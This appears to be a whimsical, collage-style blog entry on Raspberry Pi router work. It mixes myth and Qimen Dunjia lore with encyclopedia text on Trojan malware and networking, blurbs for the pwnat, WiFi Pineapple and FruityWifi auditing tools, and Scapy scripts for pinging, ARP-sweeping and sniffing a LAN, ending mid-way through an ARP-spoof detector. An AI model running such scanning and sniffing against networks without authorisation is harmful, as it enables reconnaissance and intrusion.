The World of OpenWrt: Raspberry Pi 3B [Router] Shifting Stars, Turning the Dipper 《4·6》 The Trojan Horse Sacks the City · Dunjia

[Image: Albrecht Dürer, Adam and Eve (Prado)]
Eve's apple

[Image: Golden Apple of Discord by Jacob Jordaens]
The golden apple of discord

[Image: Newton's tree, Botanic Gardens, Cambridge]
Newton's apple

[Image: a green apple]
Turing's apple

According to the Book of Genesis:

Adam and Eve lived in the Garden of Eden. Later Eve, tempted by the 『 』, ate the 『forbidden fruit』 borne by the 『tree of the knowledge of good and evil』 and gave it to Adam to eat as well, whereupon God drove the two of them out of Eden.

□: Was the forbidden fruit an apple?
○: Who knows!
□: Then is the apple the forbidden fruit?
○: Affliction is itself enlightenment!!

Perhaps it is the 『golden apple』 of Greek myth, the seed of the whole chain of cause and effect ── inscribed "to the fairest goddess" ──, which provoked → the judgement of Paris and led → to the Trojan War. It makes plain the link between 『apple』 and 『temptation』; as for how the apple came to be tied to 『knowledge』, one can only ask 『Newton』?

Although 『Newton』 did not create a 『mechanical universe』, a careful look at the 『laws of motion』 shows that once the 『constitutive equations』 of the 『material's composition』 and the 『initial conditions』 ── position and momentum ── are added, the 『trajectory』 of the object is 『determined』. This illustrates a methodology of 『software design』 centred on 『data-driven』 computation. Perhaps Alan Turing understood that 『abstract machine』 very well, and so conceived and invented the 『universal Turing machine』. Human knowledge still struggles to tame such a 『fairy computer』, yet with the development of hardware description languages (HDL) since the 1960s, perhaps we shall at last be invited into the 『world of computing machinery』 to glimpse the 『true nature of hardware and software』! 『Turing's apple』 speaks of 『respect』 and 『tolerance』; thinking about it now, he must already have 『known』 these 『algorithms』!!

─── from 《Cool Shade Under a Big Tree: 《The Great Question》

Heaven's secrets run deep, hence the Jia is hidden

[Image: oracle-bone form 1]

[Image: oracle-bone form 2]

[Image: oracle-bone form 3]

△★ 坊

《Shuowen Jiezi》: [ ], "to rise". Composed of 人 (person) and 乍.

Original sense: a carpenter chopping, paring and carving with blades to make implements.

《Shuowen Jiezi》: [ ], "the name of a ward within a settlement". Composed of 土 (earth), with 方 as phonetic. In antiquity interchangeable with 埅.

Original meaning: the protective wall of a frontier garrison.

─── excerpted from 《《Derivation》 Python Workshop [甲]: Tracing the Source

If water and earth lie level, they can be surveyed and measured with 『癸』; but when heaven's secrets run deep, one can only conceal 『甲』. Wikipedia says:

Qimen Dunjia

Qimen Dunjia, together with Da Liu Ren and Taiyi Shenshu, is one of the Three Styles (三式). It is a distinct branch of prognostication within Chinese esoterica. It uses the tracks of the Luoshu, the Nine Palaces and Eight Trigrams, and the mutual generation and restraint of the Five Phases to judge the favourability of geographical directions, and so to plan a person's movements toward the outcome most advantageous to them; it is also borrowed by fortune-tellers and physiognomists.

Overview

Qimen Dunjia names [ ] the Three Wonders (三奇), and Rest, Life, Injury, Block, Scenery, Death, Fright and Open the Eight Gates (八門); hence the name 『Qimen』 (Wonders and Gates). Among the heavenly stems 『甲』 is the most exalted yet never shows itself: the six Jia are always concealed within the Six Ceremonies 『戊, 己, 庚, 辛, 壬, 癸』. The Three Wonders and Six Ceremonies are distributed over the Nine Palaces, while Jia occupies no palace of its own; hence the name 『Dunjia』 (the hidden Jia).

In antiquity, popular tradition held that only important ministers close to the emperor, such as military strategists, the Imperial Astronomical Bureau and the State Preceptor, understood the art of Qimen Dunjia. It was later mythologised into a form of sorcery, to the point that some novels describe it as magic conferring the power to 『fly through the sky and tunnel through the earth』. Some also call it the Learning of Emperors.

History

Legend

According to the Yanbo Diaosou Ge (Song of the Old Fisherman in the Misty Waves), Qimen Dunjia originated in the age of legend, in the great battle at Zhuolu between the allied forces of the Yellow Emperor and the Flame Emperor and Chiyou. Chiyou was seven feet tall, with an iron head and a bronze body, impervious to blades and spears; he could summon wind and rain and raise fogs on the battlefield, putting the allied army at a disadvantage. The Yellow Emperor therefore prayed to heaven and at last received the Hetu and Luoshu from the Mysterious Lady of the Nine Heavens, together with the books of Taiyi, Liuren and Dunjia brought in the beak of a coloured phoenix. With these the Yellow Emperor invented the south-pointing chariot, turned the battle and won the victory. He ordered Fenghou to expound the heavenly books, which became the methods of the Three Styles: Da Liu Ren, Taiyi Shenshu, and the 1,080 arrangements of Qimen Dunjia (540 each for the Yang and Yin Escapes). The art was later learned by Jiang Ziya, who reduced it to 72 arrangements (36 each for Yang and Yin); Jiang Ziya passed it to Huang Shigong, Huang Shigong to Zhang Liang, and Zhang Liang finally condensed it to the 18 arrangements of today (9 each for Yang and Yin).

Historical record

Qian Daxin, in his Shijiazhai Yangxin Lu, argued that the method by which Wei Ping interpreted a dream for King Yuan of Song in the "Treatise on Tortoise and Rod Divination" of the Records of the Grand Historian was the art of Dunjia, while the modern scholar Yan Dunjie held that the method used should be Liuren.
The Eastern Jin alchemist Ge Hong recorded in his Baopuzi: "In my youth I wished to enter the mountains, and so I set out to study the books of Dunjia, of which there were more than sixty scrolls; the matter could not be mastered quickly, so I copied and collected their essentials as a ready reference to keep in my bag, but they are not fit to be passed on in writing." The book, however, records no military application.

The "Song of Joining the Army" by Emperor Jianwen of Liang, Xiao Gang, in the Northern and Southern Dynasties contains the line "the three gates answer to Dunjia"; Ho Peng Yoke takes this to hint that Dunjia was connected with military affairs.

Dunjia was already in circulation in the Northern and Southern Dynasties: the bibliographic treatise of the Book of Sui lists more than fifty titles containing 『Dunjia』, and there are records of Dunjia books from that period.

The Chongning Regulations for the Mathematics School of the Directorate of Education record that the Three Styles were examination subjects for students of the Northern Song Bureau of Astronomy.

……

, takes human nature as its true anchor. In physics 『quanta』 behave strangely, and in the cosmos 『spacetime』 can ripple with 『gravitational』 waves. The business of 『prediction』 always lies between the 『dim and the bright』! So is it not the 『probability』 that carries us from grasping today to opening tomorrow that matters most? Hence, at this moment when the 『old exploration』 is about to 『end』 and 『new research』 is about to 『begin』,

─── excerpted from 《W!O+'s 《Tales of the Little Weasel Workshop》: A Glimpse of the Whole Leopard, System Design · Exploration · 癸

Speaking of 『temptation』!

Trojan Horse

The Trojan Horse is the great wooden horse that the Greek army used to breach the city of Troy in the Trojan War, as told in the tale of the sack of Troy. Notably, the story of the wooden horse is not recorded in either of the Greek poet Homer's two works, the Iliad and the Odyssey; it first appears in the epic Aeneid by the Roman poet Virgil. The sack of Troy was long regarded by modern scholars as myth, until the nineteenth century, when the amateur archaeologist Heinrich Schliemann confirmed the site of Troy.

《The Procession of the Trojan Horse in Troy》, Domenico Tiepolo (1773).

Cause of the war

According to Homer and Greek mythology, the story began with a golden apple. It opens with the wedding of the sea goddess Thetis and the Greek king Peleus. Zeus had originally loved Thetis, but it was prophesied that her son (the future Achilles) would be mightier than his father; fearing a repeat of his own overthrow of his father, Zeus married her off to the famed hero Peleus to protect his reign. Many gods were invited to the wedding, but Eris, goddess of discord, alone was left out. Enraged, she threw down a golden apple inscribed "to the fairest goddess". Athena, goddess of wisdom, Aphrodite, goddess of love, and Hera, queen of heaven, each believed herself most deserving of the title. To settle the dispute they flew to Mount Ida and asked the Trojan prince Paris to judge. All three tried to bribe him: Athena promised to make Paris the wisest scholar in the world; Hera promised to make him the most powerful king under heaven; Aphrodite offered the most beautiful woman in the world. In the end Paris followed his senses and chose Aphrodite. In return, Aphrodite cast a spell so that Helen, queen of Sparta and acknowledged as the most beautiful woman in the world, fell in love with Paris. For love Helen abandoned her homeland, her husband Menelaus and her young daughter. Paris's deed enraged the Spartan king Menelaus, who, unable to contain his fury, sought help from his elder brother Agamemnon and united the Greek city-states to declare war on Troy.

The heart is hard to fathom; hence there arises the

Trojan horse (computing)

In computing, a Trojan horse, or Trojan, is any malicious computer program which misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive wooden horse that led to the fall of the city of Troy.[1][2][3][4][5]

Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an e-mail attachment disguised to appear unsuspicious (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer.[6] Trojans may allow an attacker to access users’ personal information such as banking information, passwords, or personal identity. They can infect other devices connected to the network. Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.[7]

Origin of the concept

This terminology occurs for the first time in a US Air Force report in 1974 on the analysis of vulnerability in computer systems.[8] It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture “Reflections on Trusting Trust”,[9] subtitled:

To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.

He mentioned that he knew about the possible existence of Trojan horses in a report on the security of Multics of which he was unfortunately unable to find a reference. However Paul Karger and Roger Schell affirm that this is their above cited report.[10][8][11]

Malicious uses

Trojans of this kind may require interaction with a malicious controller (not necessarily the party distributing the Trojan) to fulfill their purpose. It is possible for those involved with Trojans to scan computers on a network to locate any with a Trojan installed, which the hacker can then control.[12]

Some Trojans take advantage of a security flaw in older versions of Internet Explorer and Google Chrome to use the host computer as an anonymizer proxy to effectively hide Internet usage,[13] enabling the controller to use the Internet for illegal purposes while all potentially incriminating evidence indicates the infected computer or its IP address. The host’s computer may or may not show the internet history of the sites viewed using the computer as a proxy. The first generation of anonymizer Trojan horses tended to leave their tracks in the page view histories of the host computer. Later generations of the Trojan tend to “cover” their tracks more efficiently. Several versions of Sub7 have been widely circulated in the US and Europe and became the most widely distributed examples of this type of Trojan.[12]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.[14][15] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer[16] and the German “state trojan” nicknamed R2D2.[14] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.[17]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users’ privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, “Trojan-type malware is on the rise, accounting for 83-percent of the global malware detected in the world.” Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.[18] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.[19]

Oh? And if we reason from what

pwnat

The only tool to punch holes through firewalls/NATs where both clients and server can be behind separate NATs without any 3rd party involvement. Pwnat uses a newly developed technique, exploiting a property of NAT translation tables, with no 3rd party, port forwarding, DMZ, router administrative requirements, or spoofing required. https://samy.pl/pwnat/

pwnat - http://samy.pl/pwnat

pwnat, by Samy Kamkar, is a tool that allows any client
behind a NAT to communicate with a server behind a
separate NAT with *no* port forwarding and *no* DMZ
setup on any routers in order to directly communicate
with each other.

There is no middle man, no proxy, no 3rd party, no UPnP
required, no spoofing, no DNS tricks. The server does
not need to know the client's IP address before connecting.

More importantly, the client can then connect to any
host or port on any remote host or to a fixed host and
port decided by the server.

Simply put, this is a proxy server that works behind a NAT,
even when the client is also behind a NAT.

You can read the paper published in IEEE and presented at
the IEEE P2P'10 Conference here: http://samy.pl/pwnat/pwnat.pdf

says, then 『danger』 may well lie right at our fingertips★

The World of OpenWrt: Raspberry Pi 3B [Router] Shifting Stars, Turning the Dipper 《4·5》 Scapy 7

Some say the brain is an undefended city, so one must stay wary of 『people』 and their 『words』 and never 『believe』 one-sidedly. Back when Netscape introduced the 『JavaScript』 web scripting language:

JavaScript is a high-level programming language, executed by an interpreter; it is a dynamically typed, object-oriented (prototype-based) interpreted language[4]. It has been standardised by ECMA (the European Computer Manufacturers Association) through the ECMAScript language specification[4]. It is used by the vast majority of websites in the world and is supported by the major browsers (Chrome, IE, FireFox, Safari, Opera). JavaScript is a prototype-based, function-first language[5] and a multi-paradigm language: it supports object-oriented, imperative and functional programming. It provides syntax for manipulating text, arrays, dates and regular expressions, but does not itself support I/O such as networking, storage or graphics; these are provided by its host environment.

Although JavaScript and Java share many similarities in name and in syntax, the two languages differed greatly in design from the outset: JavaScript's design was mainly influenced by Self (a prototype-based programming language) and Scheme (a functional programming language)[5]. In syntactic structure it also resembles C in many ways (for example if statements, while loops, switch statements and do-while loops)[6].

On the client side JavaScript has traditionally been implemented as an interpreted language, but more recently it can be executed with just-in-time (JIT) compilation. With the adoption of the latest HTML5 and CSS3 standards it is also used for game, desktop and mobile application development and for server-side network environments such as Node.js.

people were already aware of its possible security concerns. That is why browsers run JavaScript programs inside a

Sandbox (computer security)

In computer security, a sandbox (沙盒, also rendered 沙箱) is a security mechanism that provides an isolated environment for running programs. It is usually used to experiment with programs that come from untrusted sources, are destructive, or whose intent cannot be determined[1].

A sandbox usually tightly controls the resources that programs inside it may access; for example, it may provide scratch disk and memory space that is reclaimed after use. Within a sandbox, network access, access to the real system and reading of input devices are usually forbidden or strictly limited. In this sense a sandbox is a form of virtualisation.

Changes made inside the sandbox cause no harm to the operating system. The technique is widely used by computer technicians to test possibly infected programs or other malicious code[2].

and that makes everything safe, does it not? Little do people realise that vendors, chasing product features, fling the side doors wide open; users, assuming they are safe, grant permissions at will; add to this many other causes:

………

and the resulting security problems may well outstrip those of 『computer viruses』??

─── 《Raspberry Pi 0W Rhapsody: Security Probe 《♪♪》

Is the 『offence and defence』 set off by market 『competition』 the origin of software 『doorways』?

Undocumented feature

Undocumented features, also known by the phrase “feature, not a bug”, are software features that are frequently found in software releases. Sometimes the documentation is omitted through simple oversight, but undocumented features are often essential elements of the software that are not intended for use by end users, but left available for use by the vendor for software support and development.

Since the suppliers of the software usually consider the software documentation to constitute a contract for the behavior of the software, undocumented features are generally left unsupported, and may be removed or changed at will and without notice to the users.

Types

Undocumented features (for example, the ability to change the switch character in MS-DOS, usually to a hyphen) can be included for compatibility purposes (in this case with Unix utilities) or for future-expansion reasons. However, if the software provider changes their software strategy to better align with the business, the absence of documentation makes it easier to justify the feature’s removal.

New versions of software might omit mention of old (possibly superseded) features in documentation but keep them implemented for users who’ve grown accustomed to them.[1]

While an incorrect use of the term, in some cases software bugs are referred to, jokingly, as undocumented features. (“It’s not a bug; it’s an undocumented feature!”) [2] This usage may have been popularised in some of Microsoft’s responses to bug reports for its first Word for Windows product,[3] but doesn’t originate there. The oldest surviving reference on Usenet dates to 5 March 1984.[4] Between 1969 and 1972, Sandy Mathes, a systems programmer for PDP-8 software at Digital Equipment Corporation (DEC) in Maynard, MA, used the terms “bug” and “feature” in her reporting of test results to distinguish between undocumented actions of delivered software products that were unacceptable and tolerable, respectively. This usage may have been perpetuated.[5]

Exceptions

Ironically, undocumented features themselves have become a major feature of computer games. Developers often include various cheats and other special features (“easter eggs“) that are not explained in the packaged material, but have become part of the “buzz” about the game on the Internet and among gamers. The undocumented features of foreign games are often elements that were not localized from their native language.

Closed source APIs can also have undocumented functions that are not generally known. These are sometimes used to gain a commercial advantage over third-party software by providing additional information or better performance to the application provider.

Are 『unofficial』 『extensions』 all 『suspect』??

List of TCP and UDP port numbers

Computers communicate according to the protocols of the Internet transport layer, TCP/IP; different protocols each correspond to different [ ]. Moreover UDP, which uses datagrams, does not necessarily use the same port numbers as TCP. Below are the port lists for the two protocols:

Port status colour legend

The legend below indicates the status of a port:

Status        | Description                                                                | Colour
Official      | The application/port combination is recorded in IANA's port assignments[1] |
Unofficial    | The application/port combination is not in IANA's port assignments         |
Multiple use  | Several applications are known to use this port                            |

Ports 0 to 1023

The list below gives only commonly used ports; for the full list see the IANA website.

Port        | Description                                                                                          | Status
0/TCP,UDP   | Reserved; not used (may serve as the source port when no reply is expected)                          | Official
1/TCP,UDP   | TCPMUX (TCP port service multiplexer)                                                                | Official
5/TCP,UDP   | RJE (Remote Job Entry)                                                                               | Official
7/TCP,UDP   | Echo protocol                                                                                        | Official
9/UDP       | DISCARD protocol                                                                                     | Official
9/TCP,UDP   | Wake-on-LAN                                                                                          | Unofficial
11/TCP,UDP  | SYSTAT protocol                                                                                      | Official
13/TCP,UDP  | DAYTIME protocol                                                                                     | Official
15/TCP,UDP  | NETSTAT protocol                                                                                     | Official
17/TCP,UDP  | QOTD (Quote of the Day) protocol                                                                     | Official
18/TCP,UDP  | Message Send Protocol                                                                                | Official
19/TCP,UDP  | CHARGEN (character generator) protocol                                                               | Official
20/TCP,UDP  | File Transfer Protocol – default data port                                                           | Official
21/TCP,UDP  | File Transfer Protocol – control port                                                                | Official
22/TCP,UDP  | SSH (Secure Shell) – remote login protocol, used for secure login, file transfer (SCP, SFTP) and port forwarding | Official
23/TCP,UDP  | Telnet terminal emulation protocol – unencrypted text communication                                  | Official
25/TCP,UDP  | SMTP (Simple Mail Transfer Protocol) – e-mail delivery between mail servers                          | Official

………

Perhaps tomorrow's

Communication protocol

In telecommunication, a communication protocol is a system of rules that allow two or more entities of a communications system to transmit information via any kind of variation of a physical quantity. The protocol defines the rules, syntax, semantics and synchronization of communication and possible error recovery methods. Protocols may be implemented by hardware, software, or a combination of both.[1]

Communicating systems use well-defined formats for exchanging various messages. Each message has an exact meaning intended to elicit a response from a range of possible responses pre-determined for that particular situation. The specified behavior is typically independent of how it is to be implemented. Communication protocols have to be agreed upon by the parties involved.[2] To reach agreement, a protocol may be developed into a technical standard. A programming language describes the same for computations, so there is a close analogy between protocols and programming languages: protocols are to communication what programming languages are to computations.[3]

Multiple protocols often describe different aspects of a single communication. A group of protocols designed to work together is known as a protocol suite; when implemented in software they are a protocol stack.

Internet communication protocols are published by the Internet Engineering Task Force (IETF). The IEEE handles wired and wireless networking, and the International Organization for Standardization (ISO) handles other types. The ITU-T handles telecommunication protocols and formats for the public switched telephone network (PSTN). As the PSTN and Internet converge, the standards are also being driven towards convergence.

 

『innovators』 of the above, before

Adding new protocols

Adding a new protocol (or more correctly: a new layer) in Scapy is very easy. All the magic is in the fields. If the fields you need are already there and the protocol is not too brain-damaged, this should be a matter of minutes.

Simple example

A layer is a subclass of the Packet class. All the logic behind layer manipulation is held by the Packet class and will be inherited. A simple layer is compounded by a list of fields that will be either concatenated when assembling the layer or dissected one by one when disassembling a string. The list of fields is held in an attribute named fields_desc. Each field is an instance of a field class:

from scapy.all import Packet, ShortField, XByteField, IntEnumField

class Disney(Packet):
    name = "Disney Packet"
    fields_desc = [ShortField("mickey", 5),
                   XByteField("minnie", 3),
                   IntEnumField("donald", 1,
                                {1: "happy", 2: "cool", 3: "angry"})]

In this example, our layer has three fields. The first one is a 2-byte integer field named mickey and whose default value is 5. The second one is a 1-byte integer field named minnie and whose default value is 3. The difference between a vanilla ByteField and an XByteField is only the fact that the preferred human representation of the field’s value is in hexadecimal. The last field is a 4-byte integer field named donald. It is different from a vanilla IntField by the fact that some of the possible values of the field have literate representations. For example, if it is worth 3, the value will be displayed as angry. Moreover, if the “cool” value is assigned to this field, it will understand that it has to take the value 2.

If your protocol is as simple as this, it is ready to use:

>>> d=Disney(mickey=1)
>>> ls(d)
mickey : ShortField = 1 (5)
minnie : XByteField = 3 (3)
donald : IntEnumField = 1 (1)
>>> d.show()
###[ Disney Packet ]###
mickey= 1
minnie= 0x3
donald= happy
>>> d.donald="cool"
>>> raw(d)
'\x00\x01\x03\x00\x00\x00\x02'
>>> Disney( )
<Disney mickey=1 minnie=0x3 donald=cool |>

This chapter explains how to build a new protocol within Scapy. There are two main objectives:

  • Dissecting: this is done when a packet is received (from the network or a file) and should be converted to Scapy’s internals.
  • Building: When one wants to send such a new packet, some stuff needs to be adjusted automatically in it.
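As an added illustration (not part of the Scapy documentation quoted above, and not Scapy code), the following pure-Python snippet reproduces by hand what the three fields of the Disney layer do when the layer is built and dissected: defaults are filled in, the enum name "cool" is translated to 2, the fields are concatenated in network byte order, and a truncated buffer is rejected rather than silently mis-dissected. The function names build_disney, dissect_disney and show_disney are my own; the field sizes, defaults and enum values are those of the example above.

```python
import struct

# Hand-written stand-in for the Disney layer of the Scapy example above:
# a 2-byte "mickey", a 1-byte "minnie" and a 4-byte enum "donald".
DONALD_NAMES = {1: "happy", 2: "cool", 3: "angry"}
DONALD_VALUES = {name: value for value, name in DONALD_NAMES.items()}
DEFAULTS = {"mickey": 5, "minnie": 3, "donald": 1}
# "!" = network byte order, no padding: unsigned short, unsigned char, unsigned int
LAYOUT = struct.Struct("!HBI")


def build_disney(**fields):
    """Assemble the layer: fill defaults, translate enum names, concatenate."""
    values = dict(DEFAULTS)
    for name, value in fields.items():
        if name not in DEFAULTS:
            raise ValueError("unknown field %r" % name)
        values[name] = value
    donald = values["donald"]
    if isinstance(donald, str):          # "cool" -> 2, as IntEnumField does
        donald = DONALD_VALUES[donald]
    return LAYOUT.pack(values["mickey"], values["minnie"], donald)


def dissect_disney(data):
    """Dissect the leading 7 bytes; whatever follows is the payload."""
    if len(data) < LAYOUT.size:
        raise ValueError("truncated Disney layer: %d bytes" % len(data))
    mickey, minnie, donald = LAYOUT.unpack_from(data)
    return {
        "mickey": mickey,
        "minnie": minnie,
        "donald": donald,               # kept numeric; named only when shown
        "payload": data[LAYOUT.size:],
    }


def show_disney(fields):
    """Render like Disney.show(): minnie in hex, donald by its enum name
    when one exists, otherwise as the raw number."""
    donald = DONALD_NAMES.get(fields["donald"], fields["donald"])
    return "mickey=%d minnie=0x%x donald=%s" % (
        fields["mickey"], fields["minnie"], donald)


if __name__ == "__main__":
    wire = build_disney(mickey=1, donald="cool")
    print(wire)                                   # b'\x00\x01\x03\x00\x00\x00\x02'
    print(show_disney(dissect_disney(wire)))      # mickey=1 minnie=0x3 donald=cool
```

The byte string produced for mickey=1, donald="cool" is exactly the raw(d) output shown in the session above, which is the point: a Scapy layer is nothing more than this pack/unpack pair with the bookkeeping done for you.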

 

must first 『deliberate carefully』!

※ Note:

so that those who later 『metamorphose』 may 『conveniently』 spread their wings and soar◎

Next-generation network

The next-generation network (NGN) is a body of key architectural changes in telecommunication core and access networks. The general idea behind the NGN is that one network transports all information and services (voice, data, and all sorts of media such as video) by encapsulating these into IP packets, similar to those used on the Internet. NGNs are commonly built around the Internet Protocol, and therefore the term all IP is also sometimes used to describe the transformation of formerly telephone-centric networks toward NGN.

NGN is a different concept from Future Internet, which is more focused on the evolution of Internet in terms of the variety and interactions of services offered.

Introduction of NGN

NGN Seminar in Fusion Technology Center by NICT (Japan) researcher

According to ITU-T, the definition is:

A next-generation network (NGN) is a packet-based network which can provide services including Telecommunication Services and is able to make use of multiple broadband, quality of Service-enabled transport technologies and in which service-related functions are independent from underlying transport-related technologies. It offers unrestricted access by users to different service providers. It supports generalized mobility which will allow consistent and ubiquitous provision of services to users.[1]

From a practical perspective, NGN involves three main architectural changes that need to be looked at separately:

  • In the core network, NGN implies a consolidation of several (dedicated or overlay) transport networks each historically built for a different service into one core transport network (often based on IP and Ethernet). It implies amongst others the migration of voice from a circuit-switched architecture (PSTN) to VoIP, and also migration of legacy services such as X.25, frame relay (either commercial migration of the customer to a new service like IP VPN, or technical emigration by emulation of the “legacy service” on the NGN).
  • In the wired access network, NGN implies the migration from the dual system of legacy voice next to xDSL setup in local exchanges to a converged setup in which the DSLAMs integrate voice ports or VoIP, making it possible to remove the voice switching infrastructure from the exchange.[2]
  • In the cable access network, NGN convergence implies migration of constant bit rate voice to CableLabs PacketCable standards that provide VoIP and SIP services. Both services ride over DOCSIS as the cable data layer standard.

In an NGN, there is a more defined separation between the transport (connectivity) portion of the network and the services that run on top of that transport. This means that whenever a provider wants to enable a new service, they can do so by defining it directly at the service layer without considering the transport layer – i.e. services are independent of transport details. Increasingly applications, including voice, tend to be independent of the access network (de-layering of network and applications) and will reside more on end-user devices (phone, PC, set-top box).

The World of OpenWrt: Raspberry Pi 3B [Router] Shifting Stars, Turning the Dipper 《4·5》 Scapy 6

The Southern Song philosopher and educator Lü Zuqian, courtesy name Bogong, a native of Shouzhou, took 『Donglai』 as his clan's place of origin on account of the Lü surname and was known as 『Master Donglai』. He wrote the Donglai Boyi, a commentary on the Zuo Zhuan, whose very first essay is "The Earl of Zheng Defeats Duan at Yan", in which he says:

The angler wrongs the fish; what wrong has the fish done the angler? The hunter wrongs the beast; what wrong has the beast done the hunter? Duke Zhuang wronged Shuduan; what wrong had Shuduan done Duke Zhuang?

WiFi Pineapple

The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose-built hardware and software, the WiFi Pineapple enables users to quickly and easily deploy advanced attacks using our intuitive web interface.

FruityWifi

Hi All,
FruityWifi is a wireless network auditing tool based on the WiFi Pineapple. The application can be installed on any Debian-based system by adding the extra packages. Tested on Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi).

fruitywifi.com

FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.

Initially the application was created to be used with the Raspberry-Pi, but it can be installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets support, Mobile Broadband (3G/4G) support, a new control panel, and more.

is a teaching aid at hacker university, already listed as a prerequisite course.

── What has happened brings reflection; what has not yet happened calls for careful thought!! ──

─── 《The 《Possibilities》 of a Music Player Prototype: Angler and Fish??

Once a 『tool』 has been mastered, then, according to how high or low its 『performance』, there naturally comes a time to

Build your own tools

You can use Scapy to make your own automated tools. You can also extend Scapy without having to edit its source file.

If you have built some interesting tools, please contribute back to the GitHub wiki!

Using Scapy in your tools

You can easily use Scapy in your own tools. Just import what you need and do it.

at such a time◎

It is fitting to 『practise』 first, proceeding 『from the shallow to the deep』◎

This first example takes an IP address or a host name as its first parameter, sends an ICMP echo request packet and displays the fully dissected reply packet:

#! /usr/bin/env python

import sys
from scapy.all import sr1,IP,ICMP

p=sr1(IP(dst=sys.argv[1])/ICMP())
if p:
    p.show()

※ Sample run:

root@kali:~/test# python ICMP-echo.py 5.168.168.20
Begin emission:
...............................Finished sending 1 packets.
........*
Received 40 packets, got 1 answers, remaining 0 packets
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = 28
  id        = 61102
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = icmp
  chksum    = 0x30c5
  src       = 5.168.168.20
  dst       = 5.168.168.9
  \options   \
###[ ICMP ]### 
     type      = echo-reply
     code      = 0
     chksum    = 0xffff
     id        = 0x0
     seq       = 0x0
###[ Padding ]### 
        load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

 

This is a more complex example which does an ARP ping and reports what it found with LaTeX formatting:

#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as a result

import sys
if len(sys.argv) != 2:
    print("Usage: arping2tex <net>\n  eg: arping2tex 192.168.1.0/24")
    sys.exit(1)

from scapy.all import srp, Ether, ARP, conf
conf.verb = 0
# Broadcast a who-has for every address in the given network and keep the answers
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),
                 timeout=2)

print(r"\begin{tabular}{|l|l|}")
print(r"\hline")
print(r"MAC & IP\\")
print(r"\hline")
for snd, rcv in ans:
    # sprintf fills the field references from the received ARP reply
    print(rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\"))
print(r"\hline")
print(r"\end{tabular}")

※ Sample run:

root@kali:~/test# python arping2tex.py 5.168.168.20
\begin{tabular}{|l|l|}
\hline
MAC & IP\\
\hline
b8:27:eb:d9:d7:2f & 5.168.168.20\\
\hline
\end{tabular}

 

Here is another tool that will constantly monitor all interfaces on a machine and print all ARP requests it sees, even on 802.11 frames from a Wi-Fi card in monitor mode. Note the store=0 parameter to sniff() to avoid storing all packets in memory for nothing:

#! /usr/bin/env python
from scapy.all import *

def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
        return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

sniff(prn=arp_monitor_callback, filter="arp", store=0)

※ Sample run:

root@kali:~/test# python arpmonitor.py 
4c:e6:76:c4:ec:f8 5.168.168.1
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
^Croot@kali:~/test#
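The monitor above prints every (MAC, IP) claim it hears and leaves interpretation to the reader. As an added example, not part of the Scapy documentation or the sample run, the code below consumes lines in that same "%ARP.hwsrc% %ARP.psrc%" format and flags the one condition a defender cares about most: an IP address that is suddenly claimed by a second, different MAC, which is what ARP spoofing looks like on the wire. The sample lines are constructed (the first four mirror the run above, the last two are invented to create a conflict); the names ArpTable, parse_arp_line and find_mac_conflicts are my own.

```python
from collections import defaultdict

# Constructed sample lines in the format printed by arpmonitor.py above.
# The first four mirror the sample run; "not a valid line" exercises the
# parser's rejection path; the last two are invented so that two IPs end
# up claimed by a second MAC.
SAMPLE_LINES = """\
4c:e6:76:c4:ec:f8 5.168.168.1
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
not a valid line
00:11:22:33:44:55 5.168.168.1
00:11:22:33:44:55 5.168.168.9
""".splitlines()


def _is_mac(text):
    """Six colon-separated hex octets."""
    octets = text.split(":")
    if len(octets) != 6:
        return False
    try:
        return all(len(o) == 2 and 0 <= int(o, 16) <= 255 for o in octets)
    except ValueError:
        return False


def parse_arp_line(line):
    """Return (mac, ip) from one monitor line, or None if it is malformed."""
    parts = line.strip().split()
    if len(parts) != 2 or not _is_mac(parts[0]):
        return None
    return parts[0].lower(), parts[1]


class ArpTable:
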